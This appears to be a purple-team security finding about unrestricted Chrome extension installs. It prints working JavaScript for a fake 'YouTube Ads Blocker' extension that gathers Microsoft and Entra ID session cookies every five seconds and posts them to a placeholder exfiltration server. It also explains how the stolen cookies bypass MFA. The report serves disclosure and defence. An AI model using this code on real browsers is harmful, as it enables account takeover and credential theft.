Chrome Ad Block Extension

During the purple team exercise, it was identified that the current endpoint policies allow users to install browser extensions without requiring administrative approval. This configuration significantly increases the organization’s exposure to risk, as adversaries can leverage malicious extensions to capture credentials, monitor user activity, or exfiltrate sensitive data without triggering immediate security controls.

Proof of Concept: "YouTube Ads Blocker" (Malicious Chrome Extension)

A PoC extension was developed to demonstrate the risk, performing the following actions:

• Entra ID Account Theft

  • Exfiltrates session cookies to a remote server.

  • Harvests browsing history and sends it to an attacker-controlled server.

Detection Challenges

• AV/EDR Evasion

  • Extension files are not flagged as malicious.

  • Executes under a trusted browser process (chrome.exe).

• Lack of User Warnings

  • Browsers like Chrome place responsibility on users for extension risks, with no security prompts.

Coding the extension

The journey began by identifying that computers allowed the installation and use of untrusted Chrome extensions, either from the Chrome Web Store or local files. This discovery led to the development of a custom Chrome extension leveraging Chrome’s documented APIs to interact with the browser.

backgroud.js

async function sendToken(cookie) {
  let exfilUrl = "http://IP:PORT/steal";

  fetch(exfilUrl, {
    method: "POST",
    headers: {
      "Content-Type": "application/json", // Ensure JSON format
    },
    body: JSON.stringify({
      domain: cookie.domain,
      name: cookie.name,
      value: cookie.value,
    }),
  })
    .then((response) => response.text())
    .then((text) => console.log(`[+] Server Response: ${text}`)) // Debug response
    .catch((error) => console.error(`[-] Fetch Error: ${error}`));
}
async function stealMicrosoftCookies() {
  let domains = [
    ".microsoft.com",
    ".login.microsoftonline.com",
    ".outlook.com",
    "outlook.office.com",
    ".teams.microsoft.com",
  ];

  for (let domain of domains) {
    chrome.cookies.getAll({ domain: domain }, (cookies) => {
      cookies.forEach(sendToken);
    });
  }
}

// Run every 5 seconds
setInterval(stealMicrosoftCookies, 5000);

manifest.json

Upon installing the extension in chrome browser. it displays as bellow.

At this instance, the extension fetches the session cookies of Microsoft login.microsoft.com and sends them to a remote server as JSON file over HTTPS channel where an adversary reuses them for authentication without requiring for MFA approval.

The extension is created to be equipped with an additional feather that allows it to exfiltrate the browsing history data to a remote server, this allows an adversary to comprehend the compromised browser and gather more information about the behavior of the target user and environment.

An attacker in possession of these session cookies could import them into an active browser session and immediately gain access to the associated ITWW accounts. For Entra ID–based accounts, this proof‑of‑concept required importing two specific cookies, ESTSAUTH and ESTSAUTHPERSISTENT, which together re‑establish the authenticated session without requiring user credentials.

Recommendation

Intune provides a global extension management policy that can be used to prevent users from installing or running untrusted web browsers. This control helps ensure that only approved and security‑vetted browsers are available within the organization’s environment, reducing the risk of unauthorized or unsafe applications being introduced.